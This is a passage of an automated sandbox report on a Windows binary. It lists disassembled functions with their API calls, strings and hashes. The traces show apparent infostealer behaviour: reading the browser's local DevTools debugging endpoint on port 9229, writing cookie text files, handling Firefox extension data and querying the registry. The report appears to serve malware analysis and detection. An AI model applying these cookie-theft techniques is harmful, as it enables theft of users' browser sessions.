                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen
                              • String ID:
                              • API String ID: 1049500425-0
                              • Opcode ID: c5caef18a75150d7220bb8371438f54c69ec6d290ac6983659ffb44181f564f1
                              • Instruction ID: 546e26561707bf781686f9079551010458c05ef726807dc13f814412c9e606f6
                              • Opcode Fuzzy Hash: c5caef18a75150d7220bb8371438f54c69ec6d290ac6983659ffb44181f564f1
                              • Instruction Fuzzy Hash: 38911F71601B07ABDB60AFB5DC9DA6BBBE8BF44340F54882DB985C3251DB34E8418B64
                              Function 005A4B10 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4B43
                              • LocalAlloc.KERNEL32(00000040,?), ref: 005A4B75
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4BC2
                              • lstrlen.KERNEL32(005C5128), ref: 005A4BCD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4BEA
                              • lstrcat.KERNEL32(00000000,005C5128), ref: 005A4BF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4C1B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4C48
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4C53
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4C7A
                              • StrStrA.SHLWAPI(?,00000000), ref: 005A4C8C
                              • lstrlen.KERNEL32(?), ref: 005A4CA0
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4CE1
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4D68
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4D91
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4DBA
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4DE0
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A4E0D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 4107348322-3310892237
                              • Opcode ID: 74b266c6ce6e46526b3dd15977a3b2dc83501fa193e17708d3c1766b44a8a926
                              • Instruction ID: 89ab21f28d33674b1553ce34c0793d120bb05ef45ca965fd32f8d912b83cbbb8
                              • Opcode Fuzzy Hash: 74b266c6ce6e46526b3dd15977a3b2dc83501fa193e17708d3c1766b44a8a926
                              • Instruction Fuzzy Hash: 18B16031A1220BABCF24EFB9D98DAAE7FB5BF85700F044528F94597211DB74EC458B90
                              Function 005992E0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 005990F0: InternetOpenA.WININET(005BD014,00000001,00000000,00000000,00000000), ref: 0059910F
                                • Part of subcall function 005990F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0059912C
                                • Part of subcall function 005990F0: InternetCloseHandle.WININET(00000000), ref: 00599139
                              • strlen.MSVCRT ref: 00599311
                              • strlen.MSVCRT ref: 0059932A
                                • Part of subcall function 005989B0: std::_Xinvalid_argument.LIBCPMT ref: 005989C6
                              • strlen.MSVCRT ref: 005993C9
                              • strlen.MSVCRT ref: 00599416
                              • lstrcat.KERNEL32(?,cookies), ref: 00599577
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 00599589
                              • lstrcat.KERNEL32(?,?), ref: 0059959A
                              • lstrcat.KERNEL32(?,005C5160), ref: 005995AC
                              • lstrcat.KERNEL32(?,?), ref: 005995BD
                              • lstrcat.KERNEL32(?,.txt), ref: 005995CF
                              • lstrlen.KERNEL32(?), ref: 005995E6
                              • lstrlen.KERNEL32(?), ref: 0059960B
                              • lstrcpy.KERNEL32(00000000,?), ref: 00599644
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 1201316467-3542011879
                              • Opcode ID: 598c1c6ec98d3092944356e9d1586828b93490339e41234d1856ab12a5a883a9
                              • Instruction ID: 13c669497e595a0f63f916626ad44b37a8e313f6e89b1b4f1e9475879a875c7a
                              • Opcode Fuzzy Hash: 598c1c6ec98d3092944356e9d1586828b93490339e41234d1856ab12a5a883a9
                              • Instruction Fuzzy Hash: 5DE13570E11219EFDF10DFA8C884ADEBBB5FF48300F1044A9E509A7241EB74AE85CB91
                              Function 005ADAA0 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 005ADAC1
                              • memset.MSVCRT ref: 005ADAD3
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005ADAFB
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ADB2E
                              • lstrcat.KERNEL32(?,00000000), ref: 005ADB3C
                              • lstrcat.KERNEL32(?,0160E838), ref: 005ADB56
                              • lstrcat.KERNEL32(?,?), ref: 005ADB6A
                              • lstrcat.KERNEL32(?,0160DB88), ref: 005ADB7E
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ADBAE
                              • GetFileAttributesA.KERNEL32(00000000), ref: 005ADBB5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005ADC1E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2367105040-0
                              • Opcode ID: 0df1534a33faef961832263e4bb917a82d8ea0ae259181603fd7d0121c73aae0
                              • Instruction ID: c7149e00dfe390885184deb9ff17b44e6e3e17d0f28692faafda2f2e43766c88
                              • Opcode Fuzzy Hash: 0df1534a33faef961832263e4bb917a82d8ea0ae259181603fd7d0121c73aae0
                              • Instruction Fuzzy Hash: F6B1837191025AAFDF10EFA4CC999EE7BB5FF88300F144969E506A7250EA349E45CBA0
                              Function 0059B3F9 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059B420
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B46E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B499
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0059B4A1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B4C9
                              • lstrlen.KERNEL32(005C5218), ref: 0059B540
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B564
                              • lstrcat.KERNEL32(00000000,005C5218), ref: 0059B570
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B599
                              • lstrlen.KERNEL32(00000000), ref: 0059B61D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B647
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0059B64F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B677
                              • lstrlen.KERNEL32(005C509C), ref: 0059B6EE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B712
                              • lstrcat.KERNEL32(00000000,005C509C), ref: 0059B71E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B74E
                              • lstrlen.KERNEL32(?), ref: 0059B857
                              • lstrlen.KERNEL32(?), ref: 0059B866
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059B88E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: bba4f3f209f5a503d7b5e2d6e0f8e0c897c86fca653498e537cf1347b18c8d58
                              • Instruction ID: 2f822183820848c7dcd9f9f2faf20d4d31791d70df8f0c864d5b6b30db9c742c
                              • Opcode Fuzzy Hash: bba4f3f209f5a503d7b5e2d6e0f8e0c897c86fca653498e537cf1347b18c8d58
                              • Instruction Fuzzy Hash: 0A024F30A012069FEF24DF65EA89A6EBFB5FF84704F19816DE4099B261D735DC42CB80
                              Function 005B3700 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
                              • RegOpenKeyExA.ADVAPI32(?,0160BC88,00000000,00020019,?), ref: 005B375D
                              • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 005B3797
                              • wsprintfA.USER32 ref: 005B37C2
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 005B37E0
                              • RegCloseKey.ADVAPI32(?), ref: 005B37EE
                              • RegCloseKey.ADVAPI32(?), ref: 005B37F8
                              • RegQueryValueExA.ADVAPI32(?,0160E610,00000000,000F003F,?,?), ref: 005B3841
                              • lstrlen.KERNEL32(?), ref: 005B3856
                              • RegQueryValueExA.ADVAPI32(?,0160E4C0,00000000,000F003F,?,00000400), ref: 005B38C7
                              • RegCloseKey.ADVAPI32(?), ref: 005B3912
                              • RegCloseKey.ADVAPI32(?), ref: 005B3929
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 13140697-3278919252
                              • Opcode ID: 35206cb1dc59736a7603f310e7b7271b7a56675fe5bf84b00c40f07e6270d48e
                              • Instruction ID: 310efeaa5d1bd2841092499f3e09f7d6c2f4a8ec26e6bef6f98ec01e522d37d4
                              • Opcode Fuzzy Hash: 35206cb1dc59736a7603f310e7b7271b7a56675fe5bf84b00c40f07e6270d48e
                              • Instruction Fuzzy Hash: DB915F729002099FCB14DF94CC85DEEBBB9FB88310F1585ADE609B7251DB35AE46CB90
                              Function 005990F0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenA.WININET(005BD014,00000001,00000000,00000000,00000000), ref: 0059910F
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0059912C
                              • InternetCloseHandle.WININET(00000000), ref: 00599139
                              • InternetReadFile.WININET(?,?,?,00000000), ref: 00599196
                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 005991C7
                              • InternetCloseHandle.WININET(00000000), ref: 005991D2
                              • InternetCloseHandle.WININET(00000000), ref: 005991D9
                              • strlen.MSVCRT ref: 005991EA
                              • strlen.MSVCRT ref: 0059921D
                              • strlen.MSVCRT ref: 0059925E
                              • strlen.MSVCRT ref: 0059927C
                                • Part of subcall function 005989B0: std::_Xinvalid_argument.LIBCPMT ref: 005989C6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 1530259920-2144369209
                              • Opcode ID: 78ef65e2dd9711645ffd52ecb9702a4a0ba0c7792c0edc418e345522f359aa97
                              • Instruction ID: e603e437a8871277a1a23215c1484293b61a0d22facb17278d7aa1d4efe7caa6
                              • Opcode Fuzzy Hash: 78ef65e2dd9711645ffd52ecb9702a4a0ba0c7792c0edc418e345522f359aa97
                              • Instruction Fuzzy Hash: 8551A471600209ABDB10DBE8DC49FEEBBF9BB84710F14416DF504A3290EBB4AA45D765
                              Function 005B1640 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 005B1681
                              • lstrcpy.KERNEL32(00000000,015FBF48), ref: 005B16AC
                              • lstrlen.KERNEL32(?,?,?,?), ref: 005B16B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B16D6
                              • lstrcat.KERNEL32(00000000,?), ref: 005B16E4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B170A
                              • lstrlen.KERNEL32(0160ABD8,?,?,?), ref: 005B171F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B1742
                              • lstrcat.KERNEL32(00000000,0160ABD8), ref: 005B174A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1772
                              • ShellExecuteEx.SHELL32(?), ref: 005B17AD
                              • ExitProcess.KERNEL32 ref: 005B17E3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                              • String ID: <
                              • API String ID: 3579039295-4251816714
                              • Opcode ID: 12e511a3f134a07541bea782703703d7aed2ce4794e1017ada410d4df407bb43
                              • Instruction ID: c1df99a3eb93f6b313101ff964c1ef92b3ff51a6d2e24d19d22651f3b4a5b190
                              • Opcode Fuzzy Hash: 12e511a3f134a07541bea782703703d7aed2ce4794e1017ada410d4df407bb43
                              • Instruction Fuzzy Hash: B2517071A0161AABDB51DFA4CD98ADEBFF9FF84300F548129E505E3251DF34AE018B98
                              Function 005AF100 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AF134
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AF162
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005AF176
                              • lstrlen.KERNEL32(00000000), ref: 005AF185
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 005AF1A3
                              • StrStrA.SHLWAPI(00000000,?), ref: 005AF1D1
                              • lstrlen.KERNEL32(?), ref: 005AF1E4
                              • lstrlen.KERNEL32(00000000), ref: 005AF202
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 005AF24F
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 005AF28F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$AllocLocal
                              • String ID: ERROR
                              • API String ID: 1803462166-2861137601
                              • Opcode ID: 4608ae49a77622073e71aa6e2cb99dd7ce4dab48a50318c6bade6109fa8a5e0e
                              • Instruction ID: 19e415be6007240ebca1b405dac93d9d7bedb944f3ce7aee49bc4a78b47d4063
                              • Opcode Fuzzy Hash: 4608ae49a77622073e71aa6e2cb99dd7ce4dab48a50318c6bade6109fa8a5e0e
                              • Instruction Fuzzy Hash: 4B517E39911206AFCB21AFB8CC4EBAE7FA5FF86704F054568E945DB211DB34EC428791
